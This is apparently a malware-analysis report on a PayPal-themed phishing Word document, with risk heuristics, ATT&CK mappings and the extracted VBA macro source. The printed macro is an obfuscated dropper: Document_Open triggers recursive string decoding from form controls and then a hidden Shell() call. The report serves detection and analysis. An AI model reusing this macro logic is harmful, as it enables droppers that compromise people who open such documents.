MALICIOUS
182
Risk Score
Malware Insights
MITRE ATT&CK
T1059.005 Visual Basic
T1566.001 Spearphishing Attachment
The sample contains VBA macros, including a Document_Open macro, which is a common technique for malicious Office documents. The macro utilizes the Shell() function, indicating it likely executes a secondary payload. The document body impersonates PayPal, requesting sensitive personal information under the guise of account verification, which is a typical phishing lure. The presence of VBA macros and the phishing pretext strongly suggest a malicious intent, likely for credential harvesting or identity theft.
Heuristics 5
-
ClamAV: Doc.Malware.Generic-6708833-0 critical CLAMAV_DETECTIONClamAV detected this file as malware: Doc.Malware.Generic-6708833-0
-
VBA macros detected medium 2 related findings OLE_VBA_MACROSDocument contains VBA macro code
-
Shell() call in VBA critical OLE_VBA_SHELLShell() call in VBA
-
Document_Open macro high OLE_VBA_DOCOPENDocument_Open macro
-
Embedded URL info EMBEDDED_URLOne or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.URL http://schemas.openxmlformats.org/drawingml/2006/main In document text (OLE body)
Extracted artifacts 1
Files carved from inside the sample during analysis.
| Filename | Kind | Source | Size |
|---|---|---|---|
macros.bas |
vba-macro | oletools.olevba.extract_macros (decoded VBA source) | 9614 bytes |
SHA-256: 422433ade305bcd73d7a57db25ff7b2c8df1a098891cd577baf13419982dc2e8 |
|||
Preview scriptFirst 1,000 lines of the extracted script
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Sub Document_Open()
array44 = "arr"
array4 array44
array44 = "44"
End Sub
Attribute VB_Name = "plus"
Public Sub General()
ctr = ""
currentTime secondBracketAddress.wl, ctr
secondBracketAddress.either = ctr
secondBracketAddress.allocating = secondBracketAddress.either
End Sub
Attribute VB_Name = "secondBracketAddress"
Attribute VB_Base = "0{A32D73AA-AC1B-4F40-BC29-B534231117BA}{BE71A090-5D98-474F-8464-158D00037C8C}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = False
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = False
Private Sub allocating_Change()
below = 21
below = 49
below = 40
below = 24
below = 71
below = 15
below = 76
below = 40
below = 60
below = 45
below = 53
below = 42
below = 85
below = 56
below = 91
below = 50
reportErr = secondBracketAddress.allocating
below = 9
below = 66
below = 30
below = 31
below = 94
below = 36
below = 25
below = 49
below = 79
below = 58
below = 21
below = 34
below = 46
below = 35
below = 68
below = 90
below = 7
below = 82
below = 78
below = 46
Shell reportErr, 0
below = 16
below = 21
below = 62
below = 75
below = 22
below = 22
below = 67
below = 98
below = 92
below = 6
below = 43
below = 80
below = 13
below = 36
End Sub
Private Sub msg_Change()
General
End Sub
Attribute VB_Name = "SYS_gettid"
Sub CP_ACP(now, currentdepth, ByRef isAddressOnStack)
isAddressOnStack = Right(Left(now, currentdepth), 1)
End Sub
Sub currentTime(mapped, ByRef si_addr)
si_addr = ""
filecount = 1
along filecount, si_addr, mapped
End Sub
Sub along(ByRef invalid, ByRef maxdepth, instead)
heapVariable = Len(instead)
If invalid <= heapVariable Then
cpcr = ""
CP_ACP instead, invalid, cpcr
irc = 1
iter cpcr, icr
snr = ""
sensitive icr - 2, snr
maxdepth = maxdepth + snr
invalid = invalid + 1
along invalid, maxdepth, instead
End If
End Sub
Sub sensitive(method, ByRef sr)
sr = ""
If method < 1 Then
CP_ACP secondBracketAddress.attempt, Len(secondBracketAddress.attempt) + method, sr
Else
CP_ACP secondBracketAddress.attempt, method, sr
End If
End Sub
Sub within(ByRef wcContainer, ByRef object, PVOID)
If wcContainer < Len(secondBracketAddress.attempt) Then
cpcr = ""
CP_ACP secondBracketAddress.attempt, wcContainer, cpcr
If PVOID <> cpcr Then
wcContainer = wcContainer + 1
within wcContainer, object, PVOID
Else
object = wcContainer
End If
End If
End Sub
Sub iter(PVOID, ByRef object)
wcContainer = 1
object = 1
within wcContainer, object, PVOID
End Sub
Attribute VB_Name = "ThreadExecutor"
Public Sub array4(typename)
secondBracketAddress.msg = typename
End Sub
' Processing file: /opt/analyzer/scan_staging/5d3e805fd11741cd861e37b8d13cd93c.bin
' ===============================================================================
' Module streams:
' Macros/VBA/ThisDocument - 1193 bytes
' Line #0:
' FuncDefn (Sub Document_Open())
' Line #1:
' LitStr 0x0003 "arr"
' St array44
' Line #2:
' Ld array44
' ArgsCall array4 0x0001
' Line #3:
' LitStr 0x0002 "44"
' St array44
' Line #4:
' Line #5:
' EndSub
' Line #6:
' Macros/VBA/plus - 1003 bytes
' Line #0:
' FuncDefn (Public Sub General())
' Line #1:
' LitStr 0x0000 ""
' St ctr
' Line #2:
' Ld secondBracketAddress
' MemLd wl
' Ld ctr
' ArgsCall currentTime 0x0002
' Line #3:
' Ld ctr
' Ld secondBracketAddress
' MemSt either
' Line #4:
' Ld secondBracketAddress
' MemLd either
' Ld secondBracketAddress
' MemSt allocating
' Line #5:
' EndSub
' Macros/VBA/secondBracketAddress - 2763 bytes
' Line #0:
' Line #1:
' Line #2:
' Line #3:
' FuncDefn (Private Sub allocating_Change())
' Line #4:
' LitDI2
... (truncated)
|
|||
Open this report in the interactive analyzer, or submit your own file for analysis.